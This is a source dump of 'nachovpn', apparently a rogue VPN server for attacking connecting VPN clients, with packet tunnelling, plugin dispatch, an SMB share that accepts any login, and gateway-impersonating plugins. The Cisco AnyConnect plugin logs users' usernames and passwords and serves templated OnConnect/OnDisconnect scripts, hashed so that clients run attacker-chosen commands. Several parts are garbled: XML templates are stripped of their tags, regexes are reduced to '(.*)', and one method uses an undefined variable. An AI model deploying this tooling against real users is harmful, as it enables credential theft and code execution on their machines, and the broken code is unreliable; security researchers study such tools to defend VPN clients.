                    self.logger.debug(f"[TUN] No callback for client {client.connection_id}, using raw data")
                    wrapped_data = packet_data

                # Add packet to queue
                self.logger.debug(f"[TUN] Queuing reply packet to client {client.connection_id} (IP {dest_ip}): original size={len(packet_data)}, wrapped size={len(wrapped_data)}")
                queue = self.packet_queues.get(client.connection_id)
                if queue:
                    try:
                        queue.put_nowait(wrapped_data)
                        self.logger.debug(f"[TUN] Queued reply packet to client {client.connection_id}")
                    except asyncio.QueueFull:
                        # slow client: drop rather than block the TUN reader
                        self.logger.warning(f"[TUN] Client {client.connection_id} queue full, dropping packet")
                else:
                    self.logger.warning(f"[TUN] No queue found for client {client.connection_id}")
            else:
                self.logger.warning(f"[TUN] No client found for destination IP {dest_ip}")
        except Exception as e:
            self.logger.error(f"[TUN] Error handling reply packet: {e}")

    def handle_client_packet(self, packet_data, connection_id):
        """Handle a packet from a client"""
        try:
            self.logger.debug(f"Handling client packet for connection_id {connection_id}")
            ip_address = self.conn_to_ip.get(connection_id)
            if not ip_address:
                self.logger.error(f"No client found for connection_id {connection_id}")
                return

            client_info = self.clients.get(ip_address)
            if not client_info:
                self.logger.error(f"No ClientInfo found for IP {ip_address}")
                return

            # Parse src/dst only for IPv4 packets long enough to carry them
            src_ip = socket.inet_ntoa(packet_data[12:16]) if len(packet_data) >= 16 and (packet_data[0] >> 4) == 4 else None
            dst_ip = socket.inet_ntoa(packet_data[16:20]) if len(packet_data) >= 20 and (packet_data[0] >> 4) == 4 else None
            self.logger.debug(f"[Client] Packet: src={src_ip} dst={dst_ip} len={len(packet_data)}")

            # Update last seen time
            # NOTE(review): create_task is not thread-safe; presumably this
            # method runs on the event-loop thread — confirm against callers.
            async def update_client():
                async with self.client_lock:
                    if ip_address in self.clients:
                        self.clients[ip_address].last_seen = time.time()
            self._loop.create_task(update_client())

            if TUNNEL_ENABLED:
                # Write packet to TUN interface
                if self.tun_fd is not None:
                    try:
                        bytes_written = os.write(self.tun_fd, packet_data)
                        self.logger.debug(f"[TUN] Wrote {bytes_written} bytes to TUN interface")
                    except BlockingIOError:
                        # TUN queue is full, drop the packet
                        self.logger.warning("TUN queue full, dropping packet")
                    except Exception as e:
                        self.logger.error(f"Error writing to TUN interface: {e}")
                        self.logger.error("Stack trace:", exc_info=True)
                else:
                    self.logger.error("TUN file descriptor not available")
            else:
                self.logger.debug(f"[TUN] Tunnel disabled. Received packet from {src_ip} to {dst_ip}")

            # Always record the packet when PCAP capture is configured
            self.append_to_pcap(packet_data)
        except Exception as e:
            self.logger.error(f"Error handling client packet: {e}")

    def append_to_pcap(self, packet):
        """Append packet to PCAP file if enabled"""
        try:
            if self.write_pcap and self._pcap_writer is not None:
                # prepend a synthetic Ethernet header so the raw IP packet is
                # readable by standard pcap tooling
                pkt = self._fake_eth / Raw(load=bytes(packet))
                self._pcap_writer.write(pkt)
        except Exception as e:
            self.logger.error(f'Error appending to PCAP: {e}')

    async def close(self):
        """Clean up resources.

        Cancels background tasks, closes client sockets, tears down the TUN
        fd and nftables table, closes pyroute2 and the PCAP writer.
        Idempotent via self._closed.
        """
        if self._closed:
            return
        try:
            # Cancel background tasks
            if TUNNEL_ENABLED and hasattr(self, '_lease_cleanup_task'):
                self._lease_cleanup_task.cancel()
                try:
                    await self._lease_cleanup_task
                except asyncio.CancelledError:
                    pass

            # Close all client connections
            async with self.client_lock:
                for client in list(self.clients.values()):
                    try:
                        if hasattr(client, 'sock'):
                            client.sock.close()
                    except Exception:
                        pass
                self.clients.clear()
                self.conn_to_ip.clear()

            # Clean up tunneling resources
            if TUNNEL_ENABLED:
                # Remove TUN fd from event loop
                if self.tun_fd is not None:
                    try:
                        self._loop.remove_reader(self.tun_fd)
                        self.logger.info("Removed TUN fd from event loop")
                    except Exception as e:
                        self.logger.error(f"Error removing TUN fd from event loop: {e}")

                # Close TUN file descriptor
                if self.tun_fd is not None:
                    try:
                        os.close(self.tun_fd)
                        self.logger.info("Closed TUN file descriptor")
                    except Exception as e:
                        self.logger.error(f"Error closing TUN file descriptor: {e}")

                try:
                    self.nft.cmd('flush table inet vpn')
                    self.nft.cmd('delete table inet vpn')
                    self.logger.info("Cleaned up nftables rules")
                except Exception as e:
                    self.logger.error(f"Error cleaning up nftables: {e}")

            # Close IPRoute
            if hasattr(self, '_ipr'):
                try:
                    await self._ipr.close()
                    self.logger.info("Closed IPRoute")
                except Exception as e:
                    self.logger.error(f"Error closing IPRoute: {e}")

            # Close PCAP writer
            if self._pcap_writer is not None:
                try:
                    self._pcap_writer.close()
                    self.logger.info("Closed PCAP writer")
                except Exception as e:
                    self.logger.error(f"Error closing PCAP writer: {e}")

            self._closed = True
            self.logger.info("PacketHandler closed successfully")
        except Exception as e:
            self.logger.error(f"Error in cleanup: {e}")
            raise

    def create_session(self, sock, wrapper_callback):
        """Create a new session: generate connection_id, assign IP, and register client."""
        connection_id = str(uuid.uuid4())
        ip_address = self.register_client(connection_id, sock, wrapper_callback)
        return connection_id, ip_address

    def get_assigned_ip(self, connection_id):
        """Return the assigned IP for a given connection_id, or None if not found."""
        return self.conn_to_ip.get(connection_id)

    def assign_socket(self, connection_id, sock):
        """Assign or update the socket for an existing client session.

        Returns True when a client with that connection_id exists.
        """
        ip_address = self.conn_to_ip.get(connection_id)
        if ip_address and ip_address in self.clients:
            self.logger.info(f"Assigning new socket to connection_id {connection_id} (IP {ip_address})")
            self.clients[ip_address].sock = sock
            return True
        self.logger.warning(f"assign_socket: No client found for connection_id {connection_id}")
        return False

    async def start(self):
        """Start the packet handler's background tasks"""
        try:
            # Set the event loop for this thread
            self._loop = asyncio.get_running_loop()
            self.logger.info(f"[TUN] PacketHandler using event loop {self._loop} in thread {threading.current_thread().name}")

            # Log the tunnel configuration
            self.logger.info(f"Tunnel configuration: TUNNEL_PRIVATE={TUNNEL_PRIVATE}, TUNNEL_FULL={TUNNEL_FULL}")

            if TUNNEL_ENABLED:
                # Initialize nftables
                self._setup_nftables()

                # Set up TUN interface
                await self._setup_tun_interface()

                # Set up TUN file descriptor
                self._setup_tun_fd()

                # Start background tasks
                if self._lease_cleanup_task is None:
                    self._lease_cleanup_task = asyncio.create_task(self._lease_cleanup())
                    self.logger.info("Started lease cleanup task")
            else:
self.logger.info("Tunnel disabled - skipping nftables, TUN interface, and lease cleanup setup") # Set up PCAP writer (always enabled if configured) if self.write_pcap and self.pcap_filename: os.makedirs(os.path.dirname(self.pcap_filename), exist_ok=True) self._fake_eth = Ether(src='01:02:03:04:05:06', dst='ff:ff:ff:ff:ff:ff') self.logger.info(f"Using TUN interface MAC {self._fake_eth.src} for PCAP") # Open PCAP writer self._pcap_writer = PcapWriter(self.pcap_filename, append=True) self.logger.info(f"Opened PCAP writer for {self.pcap_filename}") except Exception as e: self.logger.error(f"Error starting packet handler: {e}") raise ================================================ FILE: src/nachovpn/core/plugin_manager.py ================================================ import logging import traceback import os import asyncio class PluginManager: def __init__(self, loop=None): self.plugins = [] self.loop = loop or asyncio.get_event_loop() def register_plugin(self, plugin_class, **kwargs): """Register a plugin""" if plugin_class.__name__ in os.getenv("DISABLED_PLUGINS", "").split(","): logging.info(f"Skipping disabled plugin: {plugin_class.__name__}") return plugin = plugin_class(**kwargs) self.plugins.append(plugin) logging.info(f"Registered plugin: {plugin_class.__name__}") def handle_data(self, data, client_socket, client_ip): """Try each plugin to handle raw VPN data""" for plugin in self.plugins: try: if plugin.is_enabled() and plugin.can_handle_data(data, client_socket, client_ip): return plugin.handle_data(data, client_socket, client_ip) except Exception as e: logging.error(f"Error in plugin {plugin.__class__.__name__}: {e}") logging.error(traceback.format_exc()) return False def handle_http(self, handler): """Try each plugin to handle HTTP requests""" for plugin in self.plugins: try: if plugin.is_enabled() and plugin.can_handle_http(handler): handler.plugin_name = plugin.__class__.__name__ return plugin.handle_http(handler) except Exception as e: 
logging.error(f"Error in plugin {plugin.__class__.__name__}: {e}") logging.error(traceback.format_exc()) return False ================================================ FILE: src/nachovpn/core/request_handler.py ================================================ from http.server import BaseHTTPRequestHandler import logging import os class VPNStreamRequestHandler(BaseHTTPRequestHandler): def __init__(self, request, client_address, server): self.plugin_manager = server.plugin_manager super().__init__(request, client_address, server) def send_header(self, keyword, value): if keyword.lower() == 'server': value = "nginx" super().send_header(keyword, value) def handle(self): try: first_line = self.rfile.readline() if b'HTTP/' in first_line: # Parse the HTTP request line and headers self.raw_requestline = first_line if self.parse_request(): # Delegate HTTP processing to PluginManager if self.server.plugin_manager.handle_http(self): return # No plugin handled the request, send 404 logging.warning(f"Unhandled HTTP request from {self.client_address[0]}") with open(os.path.join(os.path.dirname(__file__), '..', 'plugins', 'base', 'templates', '404.html'), 'rb') as f: self.send_response(404) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(f.read()) else: # Handle raw VPN data if not self.server.plugin_manager.handle_data(first_line, self.connection, self.client_address[0]): logging.warning(f"Unhandled raw VPN data from {self.client_address[0]}: {first_line}") self.connection.close() except Exception as e: logging.error(f"Error processing request from {self.client_address[0]}: {e}") self.connection.close() def log_message(self, format, *args): plugin_name = getattr(self, 'plugin_name', 'Default') logging.info(f"[{plugin_name}] {self.client_address[0]} - - {format % args}") ================================================ FILE: src/nachovpn/core/smb_manager.py ================================================ from impacket.smbserver import 
SimpleSMBServer import os import stat import logging import threading # SMB configuration SMB_ENABLED = os.getenv("SMB_ENABLED", "false").lower() == "true" SMB_SHARE_NAME = os.getenv("SMB_SHARE_NAME", "SHARE") SMB_SHARE_PATH = os.getenv("SMB_SHARE_PATH", "smb") class SMBManager: def __init__(self): self.logger = logging.getLogger(__name__) self.server = None if SMB_ENABLED: self._setup_smb_server() def auth_callback(self, *args, **kwargs): """Authentication callback""" self.logger.debug(f"Authenticate message: {args} {kwargs}") return True def _setup_smb_server(self): """Set up the SMB server""" try: # Create share directory if it doesn't exist os.makedirs(SMB_SHARE_PATH, exist_ok=True) # Impacket's readOnly flag is not implemented, so make the directory read-only os.chmod(SMB_SHARE_PATH, stat.S_IREAD | stat.S_IEXEC) # Initialize SMB server self.server = SimpleSMBServer("0.0.0.0", 445) # Add share self.server.addShare(SMB_SHARE_NAME.upper(), SMB_SHARE_PATH, shareComment='Nacho SMB Share', readOnly='yes') # Enable SMBv2 self.server.setSMB2Support(True) # Start SMB server in a separate thread smb_thread = threading.Thread(target=self.server.start, daemon=True) smb_thread.start() self.logger.info(f"Started SMB server with share '{SMB_SHARE_NAME}' at {SMB_SHARE_PATH}") except Exception as e: self.logger.error(f"Failed to start SMB server: {e}") self.server = None ================================================ FILE: src/nachovpn/core/utils.py ================================================ from scapy.all import IP, IPv6, ARP, UDP, TCP, Ether, rdpcap, wrpcap, \ srp, sendp, conf, get_if_addr, get_if_hwaddr, getmacbyip, sniff import os import logging class PacketHandler: """ TODO: Implement a NAT-based packet handler where the plugin provides a callback function that is called when a packet is received back from its destination and written to the client tunnel. 
""" def __init__(self, write_pcap=False, pcap_filename=None, logger_name="PacketHandler"): self.write_pcap = write_pcap self.pcap_filename = pcap_filename self.logger = logging.getLogger(logger_name) if self.write_pcap and pcap_filename is not None: os.makedirs(os.path.dirname(pcap_filename), exist_ok=True) def get_free_nat_port(self): return 0 def forward_tcp_packet(self, packet_data): src_ip = packet[IP].src dst_ip = packet[IP].dst sport = packet[TCP].sport dport = packet[TCP].dport self.logger.debug(f"Processing TCP packet: {src_ip}:{sport} -> {dst_ip}:{dport}") # Get a unique NAT port for this connection nat_port = self.get_free_nat_port() # Modify packet for NAT packet[IP].src = get_if_addr(conf.iface) # Replace source IP with our IP packet[TCP].sport = nat_port # Replace source port with NAT port self.logger.debug(f"New connection: {src_ip}:{sport} -> {dst_ip}:{dport} (NAT port: {nat_port})") # Modify packet for NAT packet[IP].src = get_if_addr(conf.iface) # Replace source IP with our IP packet[TCP].sport = nat_port # Replace source port with NAT port # Recalculate checksums del packet[IP].chksum del packet[TCP].chksum # Send the packet out sendp(packet, verbose=False, iface=conf.iface) def packet_sniffer(self): def packet_callback(packet): try: if IP not in packet: return # TODO: restore original IP and TCP ports if self.receive_callback: self.receive_callback(packet) except Exception as e: self.logger.error(f"Error processing packet: {e}") self.logger.info('Starting packet sniffer') sniff(iface=conf.iface, prn=packet_callback, store=False) def handle_client_packet(self, packet_data): packet = IP(packet_data) self.logger.info(f"Received packet: {packet}") self.append_to_pcap(packet) def append_to_pcap(self, packet): try: if self.write_pcap and self.pcap_filename is not None: # Add fake layer 2 data to the packet, if missing if not packet.haslayer(Ether): src_mac = get_if_hwaddr(conf.iface) fake_ether = Ether(src=src_mac, dst=None) packet = fake_ether / 
class VPNPlugin:
    """Base class for VPN protocol plugins.

    Provides a per-plugin Flask app (used via its test_client to answer
    requests proxied from the raw HTTP handler), a Jinja2 template
    environment, credential logging, and the can_handle_*/handle_* hooks
    that PluginManager drives. Subclasses override those hooks.
    """

    def __init__(self, cert_manager=None, external_ip=None, dns_name=None, db_manager=None, template_dir=None, packet_handler=None, **kwargs):
        self.enabled = True
        self.cert_manager = cert_manager
        self.external_ip = external_ip
        self.dns_name = dns_name
        self.db_manager = db_manager
        self.template_dir = template_dir
        self.packet_handler = packet_handler
        self.logger = logging.getLogger(self.__class__.__name__)

        # setup Flask app
        self.flask_app = Flask(__name__)
        self._setup_routes()

        # Set up Jinja2 environment if template_dir is provided; the plugin's
        # own directory takes precedence over the shared base templates.
        default_dir = os.path.join(os.path.dirname(__file__), 'templates')
        if template_dir:
            self.template_env = Environment(loader=FileSystemLoader([template_dir, default_dir]))
        else:
            self.template_env = Environment(loader=FileSystemLoader(default_dir))

    def is_enabled(self):
        """Return whether PluginManager should consider this plugin."""
        return self.enabled

    def get_thumbprint(self):
        """Return the server certificate thumbprint.

        NOTE(review): callers index the result (e.g. ['sha1']), so this is
        presumably a mapping of hash names to digests — confirm against
        cert_manager. When USE_DYNAMIC_SERVER_THUMBPRINT=true, the thumbprint
        is fetched live from the server at self.dns_name instead.
        """
        thumbprint = self.cert_manager.server_thumbprint
        if os.getenv('USE_DYNAMIC_SERVER_THUMBPRINT', 'false').lower() == 'true':
            dynamic_thumbprint = self.cert_manager.get_thumbprint_from_server(self.dns_name)
            if dynamic_thumbprint:
                self.logger.debug(f"Using dynamic thumbprint for {self.dns_name}: {dynamic_thumbprint}")
                thumbprint = dynamic_thumbprint
        return thumbprint

    def _setup_routes(self):
        # Define Flask routes within the class; subclasses extend this after
        # calling super()._setup_routes().
        @self.flask_app.route('/api/v1/healthcheck', methods=['GET'])
        def healthcheck():
            return jsonify({"message": "OK"})

        @self.flask_app.errorhandler(404)
        def page_not_found(e):
            return self.render_template('404.html'), 404

    def _send_flask_response(self, response, handler):
        # Send the Flask response back to the client over the raw
        # BaseHTTPRequestHandler connection.
        handler.send_response(response.status_code)
        for header, value in response.headers:
            handler.send_header(header, value)
        handler.end_headers()
        handler.wfile.write(response.data)

    def handle_get(self, handler):
        """Replay the proxied GET through the Flask app and relay the response."""
        with self.flask_app.test_client() as client:
            response = client.get(handler.path, headers=dict(handler.headers))
            self._send_flask_response(response, handler)
        return True

    def handle_post(self, handler):
        """Replay the proxied POST (body included) through the Flask app."""
        content_length = int(handler.headers.get('Content-Length', 0))
        body = handler.rfile.read(content_length)

        # Use Flask's test_client to handle the request
        with self.flask_app.test_client() as client:
            response = client.post(handler.path, data=body, headers=dict(handler.headers))
            self._send_flask_response(response, handler)
        return True

    def render_template(self, template_name, **context):
        """Render a template with the given context"""
        if not hasattr(self, 'template_env'):
            raise Exception("No template environment configured")
        template = self.template_env.get_template(template_name)
        return template.render(**context)

    def can_handle_data(self, data, client_socket, client_ip):
        """Check if this plugin can handle the given data"""
        return False

    def can_handle_http(self, handler):
        """Determine if this plugin can handle the HTTP request"""
        return False

    def handle_data(self, data, client_socket, client_ip):
        """Handle raw (non-HTTP) protocol data; subclasses override."""
        return False

    def handle_http(self, handler):
        """Dispatch an HTTP request to handle_get/handle_post by method."""
        if handler.command == 'GET':
            return self.handle_get(handler)
        elif handler.command == 'POST':
            return self.handle_post(handler)
        return False

    def log_credentials(self, username, password, other_data=None):
        """Helper method to log credentials to the database."""
        if self.db_manager:
            self.db_manager.log_credentials(
                username=username,
                password=password,
                plugin_name=self.__class__.__name__,
                other_data=other_data
            )

    def _wrap_packet(self, packet_data, client):
        """Wrap the packet data with the plugin's specific protocol."""
        return packet_data

404 Not Found


class CTSP:
    """Minimal CSTP framing layer used by the AnyConnect plugin.

    Frame layout: magic(4, BE) | payload length(2, BE) | type(1) | pad(1) | payload.
    See draft-mavrogiannopoulos-openconnect-02.
    """

    class Constants:
        MAGIC_NUMBER = 0x53544601
        HEADER_LENGTH = 8

    class PacketType:
        DATA = 0x00
        DPD_REQ = 0x03
        DPD_RESP = 0x04
        DISCONNECT = 0x05
        KEEPALIVE = 0x07
        COMPRESSED_DATA = 0x08
        TERMINATE = 0x09

    def __init__(self, socket, packet_handler=None, connection_id=None):
        """Bind the framer to a client socket, optionally wiring DATA frames
        through packet_handler under the given connection_id."""
        self.socket = socket
        self.packet_handler = packet_handler
        self.connection_id = connection_id

    @staticmethod
    def create_packet(packet_type, data=b''):
        """Assemble one CSTP frame for the given type and payload."""
        header = (
            CTSP.Constants.MAGIC_NUMBER.to_bytes(4, 'big')
            + len(data).to_bytes(2, 'big')
            + packet_type.to_bytes(1, 'big')
            + b'\x00'
        )
        return header + data

    # Section 2.5: The Keepalive and Dead Peer Detection Protocols
    def send_dpd_resp(self, req_data):
        """Answer a DPD-REQ, echoing its extra payload in a DPD-RESP frame."""
        resp = self.create_packet(self.PacketType.DPD_RESP, req_data)
        logging.info(f"Sending DPD-RESP: {resp.hex()}")
        self.socket.sendall(resp)

    def send_keepalive(self):
        """Send an empty KEEPALIVE frame back to the client."""
        resp = self.create_packet(self.PacketType.KEEPALIVE)
        logging.info(f"Sending KEEPALIVE: {resp.hex()}")
        self.socket.sendall(resp)

    def parse(self, data):
        """Validate one inbound frame and dispatch it by its type byte.

        Malformed frames are logged and dropped; nothing is raised to the caller.
        """
        try:
            if int.from_bytes(data[0:4], byteorder='big') != self.Constants.MAGIC_NUMBER:
                raise Exception("Invalid packet")

            declared_len = int.from_bytes(data[4:6], byteorder='big')
            frame_type = data[6]
            if len(data) - self.Constants.HEADER_LENGTH != declared_len:
                raise Exception(f"Invalid packet length: {declared_len}")
            payload = data[self.Constants.HEADER_LENGTH:]

            kinds = self.PacketType
            if frame_type == kinds.DATA:
                # Only forward payloads that plausibly hold a full IPv4 header
                # (version nibble == 4, at least 20 bytes) and only when a
                # packet handler is attached.
                if len(payload) >= 20 and (payload[0] >> 4) == 4 and self.packet_handler is not None:
                    logging.debug(f"Received valid IPv4 packet")
                    self.packet_handler.handle_client_packet(payload, self.connection_id)
            elif frame_type == kinds.DISCONNECT:
                logging.info(f"Received disconnect packet. Message: {payload[1:].decode()}")
            elif frame_type == kinds.DPD_REQ:
                logging.info(f"Received DPD-REQ packet. Replying with DPD-RESP")
                self.send_dpd_resp(payload)
            elif frame_type == kinds.KEEPALIVE:
                logging.info(f"Received keepalive packet")
                self.send_keepalive()
            elif frame_type == kinds.COMPRESSED_DATA:
                logging.info(f"Received compressed packet")
            elif frame_type == kinds.TERMINATE:
                logging.info(f"Received terminate packet")
            else:
                logging.warning(f"Unknown packet type: {frame_type:04x}")
                logging.warning(f"Packet data: {payload.hex()}")
        except Exception as e:
            logging.error(f"Error parsing packet: {e}")
self.logger.info("Handling OEM customization") name = request.args.get('name') script_path = os.path.join(self.files_dir, os.path.basename(name.lstrip('scripts_'))) context = { 'cisco_command_win': self.cisco_command_win, 'cisco_command_macos': self.cisco_command_macos } if name and os.path.exists(script_path): content = self.render_file(script_path, context) return Response(content, status=200, mimetype="application/octet-stream") return abort(404) @self.flask_app.route('/', methods=['POST']) def post(): self.logger.info("Handling POST") headers = {'X-Aggregate-Auth': '1'} body = request.get_data().decode() if 'type="init"' in body: self.logger.info("Handling INIT") xml = self.render_template("prelogin.xml", vpn_name=self.vpn_name) self.logger.info(f"Sending prelogin.xml") response = xml.encode() return Response(response, status=200, mimetype='text/html', headers=headers) elif 'type="auth-reply"' in body: self.logger.info("Handling AUTH-REPLY") username = re.search('(.*)', body).group(1) password = re.search('(.*)', body).group(1) self.logger.info(f"Received username: {username} and password: {password}") info = {'User-Agent': request.headers.get('User-Agent')} self.db_manager.log_credentials( username, password, self.__class__.__name__, info ) self.logger.info("Sending auth reply") # Calculate hashes profile_xml = self.render_template("profile.xml") profile_hash = self.shasum(profile_xml) # build a table of hashes for the script files script_hashes = [ {'platform': "win", 'filename': "OnDisconnect.vbs", 'hash': None}, {'platform': "win", 'filename': "OnConnect.vbs", 'hash': None}, {'platform': "mac-intel", 'filename': "OnDisconnect.sh", 'hash': None}, {'platform': "mac-intel", 'filename': "OnConnect.sh", 'hash': None} ] # iterate over the script_hashes and calculate the hash for each file for script in script_hashes: script_path = os.path.join(self.files_dir, script['filename']) context = { 'cisco_command_win': self.cisco_command_win, 'cisco_command_macos': 
self.cisco_command_macos } if os.path.exists(script_path): content = self.render_file(script_path, context) script['hash'] = self.shasum(content) xml = self.render_template("login.xml", server_cert_hash=self.get_thumbprint()['sha1'], profile_hash=profile_hash, script_hashes=script_hashes ) response = xml.encode() return Response(response, status=200, mimetype='text/html', headers=headers) return abort(404) def handle_head(self, handler): handler.send_response(200) def handle_connect(self, handler): self.logger.info(f"Handling CONNECT for {handler.path}") try: # Create a new session and get the connection_id connection_id, ip_address = self.packet_handler.create_session(handler.connection, self._wrap_packet) session_id = hashlib.sha256(connection_id.encode()).hexdigest().upper() hostname = f"{connection_id[:8]}.nachovpn.local" self.logger.debug(f"Connection ID: {connection_id}, IP Address: {ip_address}, Session ID: {session_id}, Hostname: {hostname}") # Send headers headers = [ b"HTTP/1.1 200 OK", b"X-CSTP-Version: 1", b"X-CSTP-Protocol: Copyright (c) 2004 Cisco Systems, Inc.", f"X-CSTP-Address: {ip_address}".encode(), b"X-CSTP-Netmask: 255.255.255.0", f"X-CSTP-Hostname: {hostname}".encode(), b"X-CSTP-Lease-Duration: 1209600", b"X-CSTP-Session-Timeout: none", b"X-CSTP-Session-Timeout-Alert-Interval: 60", b"X-CSTP-Session-Timeout-Remaining: none", b"X-CSTP-Idle-Timeout: 1800", b"X-CSTP-DNS: 8.8.8.8", b"X-CSTP-Disconnected-Timeout: 1800", #b"X-CSTP-Split-Include: 10.10.0.0/255.255.255.0", b"X-CSTP-Keep: true", b"X-CSTP-Tunnel-All-DNS: true", b"X-CSTP-DPD: 0", b"X-CSTP-Keepalive: 0", b"X-CSTP-MSIE-Proxy-Lockdown: false", b"X-CSTP-Smartcard-Removal-Disconnect: true", f"X-DTLS-Session-ID: {session_id}".encode(), b"X-DTLS-Port: 80", b"X-DTLS-Keepalive: 0", b"X-DTLS-DPD: 0", b"X-CSTP-MTU: 1400", b"X-DTLS-MTU: 1400", b"X-DTLS12-CipherSuite: ECDHE-RSA-AES256-GCM-SHA384", b"X-CSTP-Routing-Filtering-Ignore: false", b"X-CSTP-Quarantine: false", b"X-CSTP-Disable-Always-On-VPN: 
false", b"X-CSTP-Client-Bypass-Protocol: false", b"X-CSTP-TCP-Keepalive: false", b"", b"" ] handler.wfile.write(b"\r\n".join(headers)) handler.wfile.flush() # Create CTSP parser parser = CTSP(handler.connection, packet_handler=self.packet_handler, connection_id=connection_id) # Just keep reading from the client forever while True: try: data = handler.connection.recv(8192) if not data: self.logger.info('Connection closed by client') break # Parse the packet data parser.parse(data) except Exception as e: self.logger.error(f"Connection error: {e}") break except Exception as e: self.logger.error(f"CONNECT error: {e}") finally: self.logger.info("Closing CONNECT tunnel") self.packet_handler.destroy_session(connection_id) handler.connection.close() def _wrap_packet(self, packet_data, client): return CTSP.create_packet(CTSP.PacketType.DATA, packet_data) def can_handle_data(self, data, client_socket, client_ip): return len(data) >= 4 and CTSP.Constants.MAGIC_NUMBER == int.from_bytes(data[:4], byteorder='big') def can_handle_http(self, handler): user_agent = handler.headers.get('User-Agent', '') if 'AnyConnect' in user_agent: return True return False def handle_data(self, data, client_socket, client_ip): try: connection_id, _ = self.packet_handler.create_session(client_socket, self._wrap_packet) parser = CTSP(client_socket, packet_handler=self.packet_handler, connection_id=connection_id) parser.parse(data) except Exception as e: self.logger.error(f"Error handling Cisco data: {e}") finally: self.packet_handler.destroy_session(connection_id) client_socket.close() return True ================================================ FILE: src/nachovpn/plugins/cisco/templates/login.xml ================================================ 106496 61D5E0@106496@2C64@1A03AA09D5B053ED6F58D56ABDF4EA125F12956C ssl-dhe /CACHE/stc/1 {{ server_cert_hash }} xml AnyConnect VPN Profile false VpnMgmtTunProfile.xml vpnm Profile\MgmtTun Profile\MgmtTun AnyConnect Management VPN Profile false 
configuration.xml nsp Network Access Manager\system Network Access Manager\newConfigFiles NAM Service Profile false CustomerExperience_Feedback.xml fsp CustomerExperienceFeedback CustomerExperienceFeedback Feedback Service Profile false ISEPostureCFG.xml isp ISE Posture ISE Posture ISE Posture Profile false ISEPosture.json json ISE Posture ISE Posture ISE Posture JSON Profile false AMPEnabler_ServiceProfile.xml asp AMPEnabler AMPEnabler AMP Enabler Service Profile false NVM_ServiceProfile.xml nvmsp NVM NVM Network Visibility Service Profile false OrgInfo.json json Umbrella Umbrella Umbrella Roaming Security Profile false 3,9,04053 binaries/anyconnect-win-5.9.04053-core-vpn-webdeploy-k9.msi AnyConnect Secure Mobility Client binaries/anyconnect-win-4.9.04053-dart-webdeploy-k9.msi AnyConnect DART binaries/anyconnect-win-4.9.04053-posture-webdeploy-k9.msi AnyConnect Posture binaries/anyconnect-win-4.9.04053-gina-webdeploy-k9.msi AnyConnect SBL binaries/anyconnect-win-4.9.04053-nam-webdeploy-k9.msi AnyConnect Network Access Manager binaries/anyconnect-win-4.9.04053-nvm-webdeploy-k9.msi AnyConnect Network Visibility binaries/anyconnect-win-4.9.04053-amp-webdeploy-k9.msi AnyConnect AMP Enabler binaries/anyconnect-win-4.9.04053-iseposture-webdeploy-k9.msi AnyConnect ISE Posture binaries/anyconnect-win-4.9.04053-umbrella-webdeploy-k9.msi AnyConnect Umbrella Roaming Security /CACHE/stc/profiles/profile.xml {{ profile_hash }} {%- for script in script_hashes -%} {%- if script['hash'] %} scripts_{{ script['filename'] }} {{ script['hash'] }} {%- endif -%} {%- endfor %} ================================================ FILE: src/nachovpn/plugins/cisco/templates/prelogin.xml ================================================ VPN2 864640002 multiple-cert single-sign-on {{ vpn_name }} 1619719004259
    def __init__(self, *args, **kwargs):
        """Initialise the plugin with its bundled templates directory."""
        # provide the templates directory relative to this plugin
        super().__init__(*args, **kwargs, template_dir=os.path.join(os.path.dirname(__file__), 'templates'))

        # Store session keys for each GUID (guid -> {'aes_key', 'aes_iv'})
        self.session_keys = {}

    def _generate_aes_keys(self):
        """Generate AES-256 key and IV.

        Returns a (key, iv) tuple of 32 and 16 random bytes respectively.
        """
        aes_key = secrets.token_bytes(32)  # 256-bit key
        aes_iv = secrets.token_bytes(16)  # 128-bit IV
        return aes_key, aes_iv

    def _aes_encrypt(self, data, key, iv):
        """Encrypt data with AES-256-CBC.

        data is padded to a 16-byte boundary using PKCS#7-style padding
        before encryption. Returns the ciphertext bytes.
        """
        cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
        encryptor = cipher.encryptor()

        # Pad data to 16-byte boundary
        padding_length = 16 - (len(data) % 16)
        padded_data = data + bytes([padding_length] * padding_length)

        encrypted_data = encryptor.update(padded_data) + encryptor.finalize()
        return encrypted_data

    def _decode_rsa_public_key(self, public_key_blob):
        """Decode RSA public key from Microsoft format.

        public_key_blob: base64-encoded Microsoft PUBLICKEYBLOB.
        Returns a cryptography RSA public key object, or None on any
        validation/parsing failure (errors are logged, not raised).
        """
        try:
            # Decode base64
            key_data = base64.b64decode(public_key_blob)

            # Microsoft RSA key format (all values in little-endian):
            # PUBLICKEYSTRUC (8 bytes):
            # - bType: 0x06 (PUBLICKEYBLOB)
            # - bVersion: 0x02
            # - reserved: 0x0000
            # - aiKeyAlg: 0x0000A400 (CALG_RSA_KEYX)
            # RSAPUBKEY (12 bytes):
            # - magic: 0x31415352 ("RSA1")
            # - bitlen: key length in bits (little-endian)
            # - pubexp: public exponent (little-endian, usually 65537)
            # modulus[bitlen/8]: modulus data
            if len(key_data) < 20:  # Minimum size for header + RSAPUBKEY
                self.logger.error("Key blob too short")
                return None

            # Check for PUBLICKEYBLOB type
            if key_data[0] != 0x06:
                self.logger.error(f"Invalid blob type: {key_data[0]} (expected 0x06)")
                return None

            # Check for RSA1 magic
            if key_data[8:12] != b'RSA1':
                self.logger.error("Invalid RSA magic")
                return None

            # Read bitlen (little-endian)
            bitlen = int.from_bytes(key_data[12:16], byteorder='little')

            # Read pubexp (little-endian)
            pubexp = int.from_bytes(key_data[16:20], byteorder='little')

            # Calculate modulus length
            modulus_len = bitlen // 8

            # Extract modulus (starts at byte 20)
            if len(key_data) < 20 + modulus_len:
                self.logger.error("Key blob too short for modulus")
                return None
            modulus_bytes = key_data[20:20+modulus_len]

            # Convert to integers (both little-endian according to Microsoft docs)
            modulus = int.from_bytes(modulus_bytes, byteorder='little')
            exponent = pubexp

            # Debug logging
            self.logger.debug(f"Parsed RSA key - Bitlen: {bitlen}, Modulus length: {len(modulus_bytes)}, Exponent: {exponent}")
            self.logger.debug(f"Modulus bytes (first 16): {modulus_bytes[:16].hex()}")
            self.logger.debug(f"Exponent bytes: {exponent.to_bytes(4, 'little').hex()}")

            # Validate exponent
            if exponent < 3:
                self.logger.error(f"Invalid RSA exponent: {exponent} (must be >= 3)")
                return None
            if exponent >= modulus:
                self.logger.error(f"Invalid RSA exponent: {exponent} (must be < modulus)")
                return None

            # Create RSA public key
